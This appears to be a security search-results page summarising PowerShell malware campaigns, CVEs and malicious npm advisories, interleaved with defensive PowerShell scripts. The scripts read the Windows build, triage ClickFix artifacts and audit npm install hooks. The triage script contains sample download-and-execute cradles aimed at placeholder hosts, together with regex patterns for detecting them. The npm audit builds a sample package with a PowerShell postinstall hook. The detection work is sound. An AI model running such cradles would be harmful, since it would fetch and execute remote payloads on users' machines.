3059 matches found
SMB Windows Full Build Number
Gets the full build number of a Windows operating system using PowerShell via SMB. SPDX-FileCopyrightText: 2025 Greenbone AG. Some text descriptions might be excerpted from referenced sources and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only. if descripti...
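The Greenbone test above runs PowerShell over SMB to read the build; the added example below (my own code, not the Greenbone test's) shows what "full build number" means in practice: the four-component string major.minor.build.UBR assembled from HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion. The UBR value is the part a scanner actually needs, because it is what separates a patched build from an unpatched one with the same OS build. The optional remote path uses WinRM (Invoke-Command) rather than SMB, which is an assumption of this example, not the test's transport.

```powershell
# Added example: compose the full Windows build number (major.minor.build.UBR)
# from the registry, the same values a scanner compares against a patch level.
# Not the Greenbone test's own code; remote execution here uses WinRM, not SMB.
function Get-WindowsFullBuildNumber {
    [CmdletBinding()]
    param(
        # Optional remote host; omit to query the local machine.
        [string]$ComputerName
    )

    $script = {
        $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
        $p = Get-ItemProperty -Path $key
        # UBR (Update Build Revision) is the fourth component and distinguishes a
        # patched build from an unpatched one; it is absent before Windows 10.
        $ubr = if ($null -ne $p.UBR) { [int]$p.UBR } else { 0 }
        # CurrentMajorVersionNumber/CurrentMinorVersionNumber exist on Windows 10+.
        # Older systems only carry CurrentVersion ("6.1", "6.3", ...); note that
        # Windows 10/11 still report CurrentVersion "6.3", so never rely on it there.
        if ($null -ne $p.CurrentMajorVersionNumber) {
            $major = [int]$p.CurrentMajorVersionNumber
            $minor = [int]$p.CurrentMinorVersionNumber
        } else {
            $major, $minor = $p.CurrentVersion.Split('.') | ForEach-Object { [int]$_ }
        }
        [pscustomobject]@{
            ComputerName   = $env:COMPUTERNAME
            ProductName    = $p.ProductName
            DisplayVersion = $p.DisplayVersion
            FullBuild      = '{0}.{1}.{2}.{3}' -f $major, $minor, [int]$p.CurrentBuildNumber, $ubr
        }
    }

    if ($ComputerName) {
        Invoke-Command -ComputerName $ComputerName -ScriptBlock $script
    } else {
        & $script
    }
}

# Compare a full build against a minimum patched build. Casting to [version]
# compares each component numerically, so 10.0.19045.5371 sorts after
# 10.0.19045.999 even though a string comparison would get it wrong.
function Test-BuildAtLeast {
    param(
        [Parameter(Mandatory)][string]$FullBuild,
        [Parameter(Mandatory)][string]$MinimumBuild
    )
    [version]$FullBuild -ge [version]$MinimumBuild
}

$info = Get-WindowsFullBuildNumber
$info | Format-List
# Example comparison against a hypothetical minimum build (placeholder value).
Test-BuildAtLeast -FullBuild $info.FullBuild -MinimumBuild '10.0.19045.0'
```

The [version] cast is the detail worth keeping: comparing "10.0.19045.5371" to "10.0.19045.999" as strings says the second is newer, which is exactly the kind of mistake that makes a patch check report a vulnerable host as fixed.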
Hackers Use ClickFix Trick to Deploy PowerShell-Based Havoc C2 via SharePoint Sites
Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. "The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in...
5 Active Malware Campaigns in Q1 2025
The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods. Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments...
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEPDRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked...
North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack
The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code supplied by the attacker. "To execute this tactic, the threat actor masquerades a...
Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks
Threat actors have been observed using the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing...
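The three ClickFix reports above (the Havoc, Kimsuky and NetSupport campaigns) share one mechanic: the victim is talked into pasting a command into the Win+R Run dialog or an elevated PowerShell console. Those two actions leave host artifacts that do not depend on any particular payload: the Run dialog history under HKCU\...\Explorer\RunMRU and the PSReadLine console history file. The added example below (my own triage script, not code from any of the reports) reads both, scores each entry against download-cradle indicators, and prints the suspicious ones. The indicator patterns and the constructed sample commands are assumptions for illustration; the hostnames are placeholders, not campaign infrastructure.

```powershell
# Added example, not from any of the reports above: triage the two artifacts a
# ClickFix-style lure leaves behind, the Win+R Run dialog history (RunMRU) and
# the PowerShell console history (PSReadLine), and flag entries that look like
# a download cradle. Indicator patterns are an assumption, not an official rule.
$CradlePatterns = @(
    '(?i)\bpowershell(\.exe)?\b.*-(w|win|windowstyle)\s*h(idden)?',     # hidden window
    '(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}',             # base64 payload
    '(?i)\b(iex|invoke-expression)\b',                                  # execute fetched text
    '(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b',
    '(?i)\bmshta(\.exe)?\s+https?://',                                  # remote HTA stage
    '(?i)\b(curl|certutil|bitsadmin)\b.*https?://'                      # LOLBin fetch
)

function Test-CradleIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits = foreach ($p in $CradlePatterns) { if ($CommandLine -match $p) { $p } }
    [pscustomobject]@{
        CommandLine = $CommandLine
        Score       = @($hits).Count
        # Two independent indicators, or any remote mshta, is enough to look at.
        Suspicious  = (@($hits).Count -ge 2) -or ($CommandLine -match '(?i)\bmshta\b')
    }
}

function Get-RunMruEntries {
    # RunMRU stores each Run-dialog entry as a value named a, b, c, ... whose
    # data is the typed text followed by a literal "\1"; MRUList gives recency.
    param([string]$Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU')
    if (-not (Test-Path $Path)) { return }
    $mru = Get-ItemProperty -Path $Path
    $order = if ($mru.MRUList) { $mru.MRUList.ToCharArray() } else { @() }
    foreach ($letter in $order) {
        $name = [string]$letter
        $text = $mru.$name
        if ($text) { $text -replace '\\1$', '' }
    }
}

function Get-PSReadLineHistoryEntries {
    # Per-user console history; an elevated console writes to the admin's profile.
    param([string]$Path = (Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'))
    if (Test-Path $Path) { Get-Content -Path $Path }
}

# Constructed samples: what a ClickFix "verification" lure typically has the
# victim paste, plus two benign entries. Placeholder hosts, not real URLs.
$Samples = @(
    'powershell -w hidden -ep bypass -c "iex (irm https://sharepoint.example.invalid/verify.txt)"',
    'mshta https://update.example.invalid/fix.hta',
    'notepad.exe',
    'cmd /c ipconfig /all'
)

$Samples + @(Get-RunMruEntries) + @(Get-PSReadLineHistoryEntries) |
    Where-Object { $_ } |
    ForEach-Object { Test-CradleIndicators -CommandLine $_ } |
    Where-Object Suspicious |
    Format-Table -AutoSize
```

On a clean host only the two constructed cradle samples are reported (the first scores 3, the mshta line is flagged on its own). When running this during an incident, collect RunMRU and ConsoleHost_history.txt for every user profile on the box, not just the current one: the Kimsuky variant has the victim open an elevated console, so the history may sit under a different account than the one that clicked the lure.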
CVE-2024-11621
Missing certificate validation in Devolutions Remote Desktop Manager on macOS, iOS, Android, and Linux allows an attacker to intercept and modify encrypted communications via a man-in-the-middle attack. Affected versions are: Remote Desktop Manager macOS 2024.3.9.0 and earlier, Remote Desktop Manager...
Devolutions Remote Desktop Manager trust management vulnerability
Devolutions Remote Desktop Manager is an application from Devolutions Canada Inc. that provides remote desktop management functionality. Devolutions Remote Desktop Manager is vulnerable to a trust management issue that stems from missing certificate validation. The following products and versions a...
North Korean APT Kimsuky Uses forceCopy Malware to Steal Browser-Stored Credentials
The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center (ASEC). The attacks commence with phishing emails...
Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks
A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision...
CVE-2024-23464
In certain cases, Zscaler Internet Access (ZIA) can be disabled by PowerShell commands with admin rights. This affects Zscaler Client Connector on Windows 4.2.1...
Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials,...
MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks
Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that...
Backup or Backup Copy Job for SharePoint, OneDrive, or Teams Data Fails With: "Cannot find object"
Challenge: After upgrading Veeam Backup for Microsoft 365 to v8 builds 8.0.2.159 or 8.0.2.200, an incremental backup or a backup copy job protecting SharePoint, OneDrive, or Teams data fails with the error: Cannot find object ... Cause: In Object Storage Repositories, the metadata saved for the...
Imperva Protects Against the Exploited CVEs in the Cleo Data Theft Attacks
The Clop ransomware group has once again demonstrated its ability to exploit vulnerabilities to compromise sensitive systems. As Cleo—a managed file transfer provider for businesses—grapples with the aftermath of Clop’s targeted attack on their systems, the spotlight turns to CVE-2024-50623 and...
MAL-2025-616 Malicious code in marked-at (npm)
This package contains a PowerShell download cradle to execute a Cobalt Strike beacon and establish command and control. --- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2adf9556402c124dc6a1146e6c3bb6a90efee66a9a0bbfdeb3188d4477099d2d Any computer that has this packag...
MAL-2025-617 Malicious code in outlookapi (npm)
The package contains several malicious PowerShell and VBS scripts used to harvest browser data, take screenshots, log keystrokes, and establish startup persistence. It also bundles a password stealer and exfiltrates stolen data via Slack and Discord webhooks. --- -= Per source details. Do not edi...
Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity Stealer
Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive.org, a file-hosting website, and used the same...
Malicious code in walletcore-gen (npm)
The package contains several malicious PowerShell and VBS scripts used to harvest browser data, take screenshots, log keystrokes, and establish startup persistence. It also bundles a password stealer and exfiltrates stolen data via Slack and Discord webhooks. --- -= Per source details. Do not edi...
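The three npm advisories above (marked-at, outlookapi, walletcore-gen) all rely on the same delivery point: an install-time lifecycle script that launches a PowerShell or VBS stage as soon as the package is installed. Reviewing those hooks is the cheapest check a developer or CI pipeline can run. The added example below (my own script, not code from the advisories or from the packages) walks a node_modules tree, lists every preinstall/install/postinstall/prepare hook, and flags the ones that invoke a Windows script interpreter. It builds a constructed sample tree under $env:TEMP so it runs without a real project; the package names and commands in that tree are made up for illustration.

```powershell
# Added example, not from the advisories above: list install-time lifecycle
# scripts in an npm project's node_modules, the hook a malicious package uses
# to run a PowerShell or VBS stage. Builds a constructed sample tree so it runs
# stand-alone; point -NodeModules at a real project to audit it.
function Get-NpmInstallHooks {
    param(
        [Parameter(Mandatory)][string]$NodeModules,
        # Hooks npm runs automatically during `npm install`.
        [string[]]$Hooks = @('preinstall', 'install', 'postinstall', 'prepare')
    )
    Get-ChildItem -Path $NodeModules -Recurse -Filter package.json -File |
        ForEach-Object {
            $pkg = try { Get-Content -Raw -Path $_.FullName | ConvertFrom-Json } catch { $null }
            if (-not $pkg -or -not $pkg.scripts) { return }
            foreach ($h in $Hooks) {
                $cmd = $pkg.scripts.$h
                if ($cmd) {
                    [pscustomobject]@{
                        Package = $pkg.name
                        Version = $pkg.version
                        Hook    = $h
                        Command = $cmd
                        # A Windows script interpreter in an install hook deserves a manual look.
                        Flag    = $cmd -match '(?i)\b(powershell|pwsh|cscript|wscript|mshta)\b|\.(ps1|vbs)\b'
                        Path    = $_.FullName
                    }
                }
            }
        }
}

# Constructed sample tree: one benign package and one with a PowerShell postinstall.
$root   = Join-Path $env:TEMP ('npm-audit-' + [guid]::NewGuid())
$benign = Join-Path $root 'node_modules\left-pad-example'
$bad    = Join-Path $root 'node_modules\suspicious-example'
New-Item -ItemType Directory -Path $benign, $bad -Force | Out-Null
@'
{ "name": "left-pad-example", "version": "1.0.0", "scripts": { "test": "node test.js" } }
'@ | Set-Content -Path (Join-Path $benign 'package.json')
@'
{ "name": "suspicious-example", "version": "0.0.1",
  "scripts": { "postinstall": "powershell -ep bypass -File setup.ps1" } }
'@ | Set-Content -Path (Join-Path $bad 'package.json')

Get-NpmInstallHooks -NodeModules (Join-Path $root 'node_modules') | Format-Table -AutoSize
Remove-Item -Recurse -Force -Path $root
```

Only suspicious-example appears in the output, flagged on its postinstall hook. The flag is deliberately narrow: plenty of legitimate native packages have install hooks that run node-gyp or download a prebuilt binary, so the point is not to block every hook but to make a PowerShell, VBS or mshta launch visible before `npm install` runs it. In CI, `npm ci --ignore-scripts` followed by this listing gives a chance to review the hooks before allowing them.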